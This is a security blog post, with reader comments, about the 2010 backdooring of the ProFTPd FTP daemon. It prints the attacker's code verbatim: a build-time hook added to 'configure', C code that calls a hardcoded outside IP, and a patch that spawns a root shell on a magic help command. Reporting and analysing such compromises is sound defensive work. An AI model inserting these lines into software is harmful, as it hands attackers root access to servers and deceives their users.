xorl %eax, %eax

News: ProFTPd owned and backdoored

with 7 comments

I have just been informed of this. After compromising the remote host, they backdoored the popular FTP daemon by adding the following stuff.

gcc tests/tests.c -o tests/tests >/dev/null 2>&1
cc tests/tests.c -o tests/tests >/dev/null 2>&1
tests/tests >/dev/null 2>&1 &
rm -rf tests/tests.c tests/tests >/dev/null 2>&1

This was appended in ‘configure’ file and it adds a new C file under tests directory named tests.c which is this:

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#include <signal.h>
#include <string.h>

#define DEF_PORT 9090
#define DEF_TIMEOUT 15
#define DEF_COMMAND "GET /AB HTTP/1.0\r\n\r\n"

int sock;

void handle_timeout(int sig)
{
    close(sock);
    exit(0);
}

int main(void)
{

        struct sockaddr_in addr;
        struct hostent *he;
        u_short port;
        char ip[20]="212.26.42.47";
        port = DEF_PORT;
        signal(SIGALRM, handle_timeout);
        alarm(DEF_TIMEOUT);
        he=gethostbyname(ip);
        if(he==NULL) return(-1);
        addr.sin_addr.s_addr = *(unsigned long*)he->h_addr;
        addr.sin_port = htons(port);
        addr.sin_family = AF_INET;
        memset(addr.sin_zero, 0, 8);
        sprintf(ip, inet_ntoa(addr.sin_addr));
        if((sock = socket(AF_INET, SOCK_STREAM, 0))==-1)
        {
                return EXIT_FAILURE;
        }
        if(connect(sock, (struct sockaddr*)&addr, sizeof(struct sockaddr))==-1)
        {
            close(sock);
            return EXIT_FAILURE;
        }
        if(-1 == send(sock, DEF_COMMAND, strlen(DEF_COMMAND), 0))
        {
            return EXIT_FAILURE;
        }
        close(sock);

return 0; }

A simple remote backdoor that uses ‘DEF_COMMAND’ magic value. In addition, src/help.c was patched to add the following ‘if’ clause:

     } else {
      if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); }
       /* List the syntax for the given target command. */
       for (i = 0; i < help_list->nelts; i++) {

Quite self-explanatory. Unfortunately, the compromise and the subsequent backdooring were quickly detected…

Written by xorl

December 2, 2010 at 13:33

Posted in hax, news

7 Responses

Subscribe to comments with RSS.

  1. Ο Thiseas το κανε;

    some user

    December 2, 2010 at 17:14

  2. >>A simple remote backdoor that uses ‘DEF_COMMAND’ magic value
    Is it?

    PS Nice blog!

    toast

    December 2, 2010 at 18:01

  3. @toast: I didn’t go into any details because it’s very straightforward. It connects back to 212.26.42.47:9090 and sends ‘DEF_COMMAND’.

    xorl

    December 2, 2010 at 21:38

  4. Why did they add another file, seems a bit overkill to me.

    Quassum

    December 2, 2010 at 22:08

  5. Can you imagine connect back to saudi arabia! Hmm who could have thot

    Persist

    December 3, 2010 at 02:34

  6. Really, using IPv4 specific library calls, defines and structures is so 80’s, not mentioning the not-portable signal handling. What they are teaching the kids these days ?

    Vlad

    December 4, 2010 at 01:30

  7. @xorl: Yes, thats what it does. Yet you call it a backdoor.

    q

    December 5, 2010 at 02:38


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s